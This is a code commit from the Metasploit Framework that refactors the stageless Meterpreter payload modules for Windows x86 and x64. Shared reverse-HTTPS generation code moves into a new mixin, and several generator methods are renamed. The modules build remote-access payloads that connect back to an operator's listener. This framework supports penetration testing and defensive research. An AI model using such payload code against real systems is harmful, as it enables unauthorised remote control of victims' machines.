Refactor of code to reduce duplication

Add mixin for the stageless http preparation

Author: OJ

lib/msf/core/handler/reverse_http/stageless.rb

@@ -0,0 +1,73 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/parser/x509_certificate'
+
+module Msf
+
+##
+#
+# Helper functionality for handling of stageless http(s) payloads
+#
+##
+
+module Handler::ReverseHttp::Stageless
+
+  include Msf::Payload::Windows::VerifySsl
+
+  def initialize_stageless
+    register_options([
+      OptString.new('EXTENSIONS', [false, "Comma-separated list of extensions to load"]),
+    ], self.class)
+  end
+
+  def generate_stageless(&block)
+    checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN)
+    rand = Rex::Text.rand_text_alphanumeric(16)
+    url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/"
+
+    unless block_given?
+      raise ArgumentError, "Stageless generation requires a block argument"
+    end
+
+    # invoke the given function to generate the architecture specific payload
+    block.call(url) do |dll|
+
+      # TODO: figure out this bit
+      # patch the target ID into the URI if specified
+      #if opts[:target_id]
+      #  i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00")
+      #  if i
+      #    t = opts[:target_id].to_s
+      #    raise "Target ID must be less than 5 bytes" if t.length > 4
+      #    u = "/B#{t} HTTP/1.0\r\n\r\n\x00"
+      #    print_status("Patching Target ID #{t} into DLL")
+      #    dll[i, u.length] = u
+      #  end
+      #end
+
+      verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
+                                           datastore['HandlerSSLCert'])
+
+      Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll,
+        :url            => url,
+        :ssl            => true,
+        :ssl_cert_hash  => verify_cert_hash,
+        :expiration     => datastore['SessionExpirationTimeout'].to_i,
+        :comm_timeout   => datastore['SessionCommunicationTimeout'].to_i,
+        :ua             => datastore['MeterpreterUserAgent'],
+        :proxyhost      => datastore['PROXYHOST'],
+        :proxyport      => datastore['PROXYPORT'],
+        :proxy_type     => datastore['PROXY_TYPE'],
+        :proxy_username => datastore['PROXY_USERNAME'],
+        :proxy_password => datastore['PROXY_PASSWORD'])
+    end
+
+  end
+
+end
+
+end

lib/msf/core/payload/windows/stageless_meterpreter.rb

@@ -51,7 +51,7 @@ def asm_invoke_metsrv(opts={})
     asm
   end
 
-  def generate_stageless_meterpreter(url = nil)
+  def generate_stageless_x86(url = nil)
     dll, offset = load_rdi_dll(MeterpreterBinaries.path('metsrv', 'x86.dll'))
 
     conf = {

lib/msf/core/payload/windows/x64/stageless_meterpreter.rb

@@ -51,7 +51,7 @@ def asm_invoke_metsrv(opts={})
     asm
   end
 
-  def generate_stageless_meterpreter(url = nil)
+  def generate_stageless_x64(url = nil)
     dll, offset = load_rdi_dll(MeterpreterBinaries.path('metsrv', 'x64.dll'))
 
     conf = {

modules/payloads/singles/windows/meterpreter_bind_tcp.rb

@@ -37,7 +37,7 @@ def initialize(info = {})
   def generate
     # blank LHOST indicates bind payload
     url = "tcp://:#{datastore['LPORT']}"
-    generate_stageless_meterpreter(url)
+    generate_stageless_x86(url)
   end
 
 end

modules/payloads/singles/windows/meterpreter_reverse_https.rb

@@ -5,18 +5,18 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_https'
+require 'msf/core/handler/reverse_http/stageless'
 require 'msf/core/payload/windows/stageless_meterpreter'
 require 'msf/base/sessions/meterpreter_x86_win'
 require 'msf/base/sessions/meterpreter_options'
-require 'rex/parser/x509_certificate'
 
-module Metasploit3
+module Metasploit4
 
   CachedSize = :dynamic
 
   include Msf::Payload::Windows::StagelessMeterpreter
+  include Msf::Handler::ReverseHttp::Stageless
   include Msf::Sessions::MeterpreterOptions
-  include Msf::Payload::Windows::VerifySsl
 
   def initialize(info = {})
 
@@ -31,48 +31,13 @@ def initialize(info = {})
       'Session'     => Msf::Sessions::Meterpreter_x86_Win
       ))
 
-    register_options([
-      OptString.new('EXTENSIONS', [false, "Comma-separated list of extensions to load"]),
-    ], self.class)
+    initialize_stageless
   end
 
   def generate
-    checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN)
-    rand = Rex::Text.rand_text_alphanumeric(16)
-    url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/"
-
-    generate_stageless_meterpreter(url) do |dll|
-
-      # TODO: figure out this bit
-      # patch the target ID into the URI if specified
-      #if opts[:target_id]
-      #  i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00")
-      #  if i
-      #    t = opts[:target_id].to_s
-      #    raise "Target ID must be less than 5 bytes" if t.length > 4
-      #    u = "/B#{t} HTTP/1.0\r\n\r\n\x00"
-      #    print_status("Patching Target ID #{t} into DLL")
-      #    dll[i, u.length] = u
-      #  end
-      #end
-
-      verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
-                                           datastore['HandlerSSLCert'])
-
-      Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll,
-        :url            => url,
-        :ssl            => true,
-        :ssl_cert_hash  => verify_cert_hash,
-        :expiration     => datastore['SessionExpirationTimeout'].to_i,
-        :comm_timeout   => datastore['SessionCommunicationTimeout'].to_i,
-        :ua             => datastore['MeterpreterUserAgent'],
-        :proxyhost      => datastore['PROXYHOST'],
-        :proxyport      => datastore['PROXYPORT'],
-        :proxy_type     => datastore['PROXY_TYPE'],
-        :proxy_username => datastore['PROXY_USERNAME'],
-        :proxy_password => datastore['PROXY_PASSWORD'])
-    end
-
+    # generate a stageless payload using the x86 version of
+    # the stageless generator
+    generate_stageless(&method(:generate_stageless_x86))
   end
 
 end

modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb

@@ -37,7 +37,7 @@ def initialize(info = {})
 
   def generate
     url = "tcp6://#{datastore['LHOST']}:#{datastore['LPORT']}?#{datastore['SCOPEID']}"
-    generate_stageless_meterpreter(url)
+    generate_stageless_x86(url)
   end
 
 end

modules/payloads/singles/windows/meterpreter_reverse_tcp.rb

@@ -36,7 +36,7 @@ def initialize(info = {})
 
   def generate
     url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
-    generate_stageless_meterpreter(url)
+    generate_stageless_x86(url)
   end
 
 end

modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb

@@ -5,18 +5,18 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_https'
+require 'msf/core/handler/reverse_http/stageless'
 require 'msf/core/payload/windows/x64/stageless_meterpreter'
 require 'msf/base/sessions/meterpreter_x64_win'
 require 'msf/base/sessions/meterpreter_options'
-require 'rex/parser/x509_certificate'
 
-module Metasploit3
+module Metasploit4
 
   CachedSize = :dynamic
 
   include Msf::Payload::Windows::StagelessMeterpreter_x64
+  include Msf::Handler::ReverseHttp::Stageless
   include Msf::Sessions::MeterpreterOptions
-  include Msf::Payload::Windows::VerifySsl
 
   def initialize(info = {})
 
@@ -31,48 +31,13 @@ def initialize(info = {})
       'Session'     => Msf::Sessions::Meterpreter_x64_Win
       ))
 
-    register_options([
-      OptString.new('EXTENSIONS', [false, "Comma-separated list of extensions to load"]),
-    ], self.class)
+    initialize_stageless
   end
 
   def generate
-    checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN)
-    rand = Rex::Text.rand_text_alphanumeric(16)
-    url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/"
-
-    generate_stageless_meterpreter(url) do |dll|
-
-      # TODO: figure out this bit
-      # patch the target ID into the URI if specified
-      #if opts[:target_id]
-      #  i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00")
-      #  if i
-      #    t = opts[:target_id].to_s
-      #    raise "Target ID must be less than 5 bytes" if t.length > 4
-      #    u = "/B#{t} HTTP/1.0\r\n\r\n\x00"
-      #    print_status("Patching Target ID #{t} into DLL")
-      #    dll[i, u.length] = u
-      #  end
-      #end
-
-      verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
-                                           datastore['HandlerSSLCert'])
-
-      Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll,
-        :url            => url,
-        :ssl            => true,
-        :ssl_cert_hash  => verify_cert_hash,
-        :expiration     => datastore['SessionExpirationTimeout'].to_i,
-        :comm_timeout   => datastore['SessionCommunicationTimeout'].to_i,
-        :ua             => datastore['MeterpreterUserAgent'],
-        :proxyhost      => datastore['PROXYHOST'],
-        :proxyport      => datastore['PROXYPORT'],
-        :proxy_type     => datastore['PROXY_TYPE'],
-        :proxy_username => datastore['PROXY_USERNAME'],
-        :proxy_password => datastore['PROXY_PASSWORD'])
-    end
-
+    # generate a stageless payload using the x64 version of
+    # the stageless generator
+    generate_stageless(&method(:generate_stageless_x64))
   end
 
 end

modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb

@@ -37,7 +37,7 @@ def initialize(info = {})
 
   def generate
     url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
-    generate_stageless_meterpreter(url)
+    generate_stageless_x64(url)
   end
 
 end